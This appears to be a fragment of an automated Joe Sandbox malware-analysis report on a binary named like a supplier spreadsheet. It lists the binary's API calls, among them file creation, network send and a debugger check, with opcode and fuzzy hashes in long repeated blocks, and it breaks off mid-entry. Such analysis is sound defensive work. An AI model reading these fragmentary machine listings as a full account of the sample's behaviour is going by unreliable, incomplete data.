                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Timeout_strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2777139624-0
                                                                                                                  • Opcode ID: 09e3acb8bfefdc6bf8172a8e614bf73ebb06ed30d465e4b5158220ca0f8792d2
                                                                                                                  • Instruction ID: d185f0f8040e286ece36886c89615fae23313c2a5e2624f96f0a5890af33ffd0
                                                                                                                  • Opcode Fuzzy Hash: 09e3acb8bfefdc6bf8172a8e614bf73ebb06ed30d465e4b5158220ca0f8792d2
                                                                                                                  • Instruction Fuzzy Hash: 7411CA312002056BDF04BBA9DCD6DBE7BA9DF46340B00443DF60ADB192EE609845C7B0
                                                                                                                  APIs
                                                                                                                  • 74E4C8D0.UXTHEME ref: 00D736E6
                                                                                                                    • Part of subcall function 00D92025: __lock.LIBCMT ref: 00D9202B
                                                                                                                    • Part of subcall function 00D732DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D732F6
                                                                                                                    • Part of subcall function 00D732DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D7330B
                                                                                                                    • Part of subcall function 00D7374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D7376D
                                                                                                                    • Part of subcall function 00D7374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00D7377F
                                                                                                                    • Part of subcall function 00D7374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00E31120,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00E31124,?,?), ref: 00D737EE
                                                                                                                    • Part of subcall function 00D7374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00D73860
                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00D73726
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3809921791-0
                                                                                                                  • Opcode ID: 770b5edeff28e02a8dc53f234bd71881a9b4d679c26141398c208c97158ed21f
                                                                                                                  • Instruction ID: f5742f7376a375bdaea92e3f4de201194e58ad930400514200712bca635ee874
                                                                                                                  • Opcode Fuzzy Hash: 770b5edeff28e02a8dc53f234bd71881a9b4d679c26141398c208c97158ed21f
                                                                                                                  • Instruction Fuzzy Hash: D5118EB19083459FC704EF2ADC4991ABFE9EB84710F00855EF488972A1DB709948CFB2
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00D74C2B,?,?,?,?,00D7BE63), ref: 00D74BB6
                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00D74C2B,?,?,?,?,00D7BE63), ref: 00DE4972
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: a8367c4b079a675e20ec3c7dbae7f60ef34b689bfb33b86bc514d90c8b8cf1fe
                                                                                                                  • Instruction ID: 628acba688173224d09f6538303fbd2290fefb832a5e0482cacdd30ae1db6b51
                                                                                                                  • Opcode Fuzzy Hash: a8367c4b079a675e20ec3c7dbae7f60ef34b689bfb33b86bc514d90c8b8cf1fe
                                                                                                                  • Instruction Fuzzy Hash: 59018070244308BEF3255E248C8AF663ADDEB05768F14C319BAE86A1E0D7B49C44CB20
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F282
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F2A6
                                                                                                                    • Part of subcall function 00D8F2D0: _memmove.LIBCMT ref: 00D8F307
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3033907384-0
                                                                                                                  • Opcode ID: 556c32883312d9645b866383fdd0567a3a16999fb16c373c064bdb38905da7d0
                                                                                                                  • Instruction ID: 0ce1a926f4839343849014e1bb8d636453fe7353d5e74a1f7ad37f24c61b3074
                                                                                                                  • Opcode Fuzzy Hash: 556c32883312d9645b866383fdd0567a3a16999fb16c373c064bdb38905da7d0
                                                                                                                  • Instruction Fuzzy Hash: F0F03CB6104214BFAB10AF65AC44DBB7FAEEF8A3607008026FD08CA111DA31DC00C775
                                                                                                                  APIs
                                                                                                                  • ___lock_fhandle.LIBCMT ref: 00D9F7D9
                                                                                                                  • __close_nolock.LIBCMT ref: 00D9F7F2
                                                                                                                    • Part of subcall function 00D9886A: __getptd_noexit.LIBCMT ref: 00D9886A
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1046115767-0
                                                                                                                  • Opcode ID: 25d9afde3779225b395cc0834291b09d91cc82f2fa151ba22fe6e835df90cc51
                                                                                                                  • Instruction ID: 0fbb3253d132c9835fe2c54022bb8302ccaf9738aa957e4f2e967e02c73af215
                                                                                                                  • Opcode Fuzzy Hash: 25d9afde3779225b395cc0834291b09d91cc82f2fa151ba22fe6e835df90cc51
                                                                                                                  • Instruction Fuzzy Hash: B11108B2C056149EDF517FA4E8463587A90DF42731F6A0360E474AF1E3CBB4990097B1
                                                                                                                  APIs
                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 00DC9534
                                                                                                                  • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00DC9557
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1802528911-0
                                                                                                                  • Opcode ID: 7c76bde2355aa13f65c37e9f3a14db07445165ab8a205951d817139a2edc5ccd
                                                                                                                  • Instruction ID: afa37ffe7b4254dd014411f55ff6faa5deba24c3bca9a07aca0aabfe3021e58a
                                                                                                                  • Opcode Fuzzy Hash: 7c76bde2355aa13f65c37e9f3a14db07445165ab8a205951d817139a2edc5ccd
                                                                                                                  • Instruction Fuzzy Hash: 5F011A752002009FD710EB68D895B6AB7EAEB99720F14852EE65A8B391DA70EC05CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • __lock_file.LIBCMT ref: 00D942B9
                                                                                                                    • Part of subcall function 00D95A9F: __lock.LIBCMT ref: 00D95AC2
                                                                                                                  • __fclose_nolock.LIBCMT ref: 00D942C4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2800547568-0
                                                                                                                  • Opcode ID: 431412a4639828016ffa70c08ecad3614f8bd1a8b11f2ccc7a85872502bd2c4c
                                                                                                                  • Instruction ID: c0290e876b2e6fd54378ee87d810a53aabc3d2ac59e6bffa058f567ef173124f
                                                                                                                  • Opcode Fuzzy Hash: 431412a4639828016ffa70c08ecad3614f8bd1a8b11f2ccc7a85872502bd2c4c
                                                                                                                  • Instruction Fuzzy Hash: F4F0B4318127149ADF21ABB59802B5E6BD0BF41334F258209B864AB1C3CB7CD9029B79
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00D8F57A
                                                                                                                    • Part of subcall function 00D7E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E279
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00DE75D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1792118007-0
                                                                                                                  • Opcode ID: af95447e38c3e55b4fb82c9812056aae4c5934a1037ab9b5bf70dee0ce549e09
                                                                                                                  • Instruction ID: 21d727ceaedb29d5c6a4027c394939b5604e17555ac02a861403e56fcb4ffa1e
                                                                                                                  • Opcode Fuzzy Hash: af95447e38c3e55b4fb82c9812056aae4c5934a1037ab9b5bf70dee0ce549e09
                                                                                                                  • Instruction Fuzzy Hash: 5DF058712003149FD314EF69D409BA6BBE9EB58320F00806AF85EC7351EB70A800CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • __wcsnicmp.LIBCMT ref: 00D783C4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __itow__swprintf__wcsnicmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 712828618-0
                                                                                                                  • Opcode ID: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                                                                                                  • Instruction ID: 08044cb65dd6342eef68762ba70563ed6e1826b2d831992b82227fa7ddb0091f
                                                                                                                  • Opcode Fuzzy Hash: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                                                                                                  • Instruction Fuzzy Hash: F6F15C71508342AFC705EF18C89586FBBE6FF98314F54891DF98A97221EB30E905DB62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                  • Instruction ID: 15501085da0c1d8dfce541a51d293db21e4c9fd335259cb90cfa7490b7e847ee
                                                                                                                  • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                  • Instruction Fuzzy Hash: 5861A1B0A042069FCB10EF55C884A7AF7E5FF18310F148269E916C7691E731EC95CBB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: efcdf9dab569f9a8f0f01199b5b330d6128a1d6fa7ff8e88c935a951b3ec5c9f
                                                                                                                  • Instruction ID: 393533ffebf50b03ec38cf4410c12ab383cf7d965dee5b27d69d79ee9c2dbfeb
                                                                                                                  • Opcode Fuzzy Hash: efcdf9dab569f9a8f0f01199b5b330d6128a1d6fa7ff8e88c935a951b3ec5c9f
                                                                                                                  • Instruction Fuzzy Hash: B0516035600214AFCF14FB68CD91EAD77AAEF49354B148069F54A9B292EB30ED01DB70
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                  • Instruction ID: 1920e881237ac9d8aca207aede895c4139ca00108e365cc6b3fff245f8642076
                                                                                                                  • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                  • Instruction Fuzzy Hash: 8F414B79200702DFC7289F19D491A62F7E0FF89361718C56EE99E8B751E730E852CB61
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00D74F8F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: 1b67aa49db2bc8018deba10b7f2a52bbefb97edeb99ca7c6a536c117a56c987a
                                                                                                                  • Instruction ID: 8d92d38934c74c4ddf811073a1a8d6647e8cf34ba569a7eec13ab8aceb5a5b40
                                                                                                                  • Opcode Fuzzy Hash: 1b67aa49db2bc8018deba10b7f2a52bbefb97edeb99ca7c6a536c117a56c987a
                                                                                                                  • Instruction Fuzzy Hash: E8311971A00656ABCB09DF6DC484AADF7B5BF88310F18C629E81997754E770F990CBA0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: select
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1274211008-0
                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction ID: c670bd78d18feaca2579cb7dc9e9d626276146e6cd686ff6577ac5f2707c76a4
                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction Fuzzy Hash: A231B570A04106EBC718FF58D480A6DFBA5FB59310B2986A5E489CB255D731EDC1CFE0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
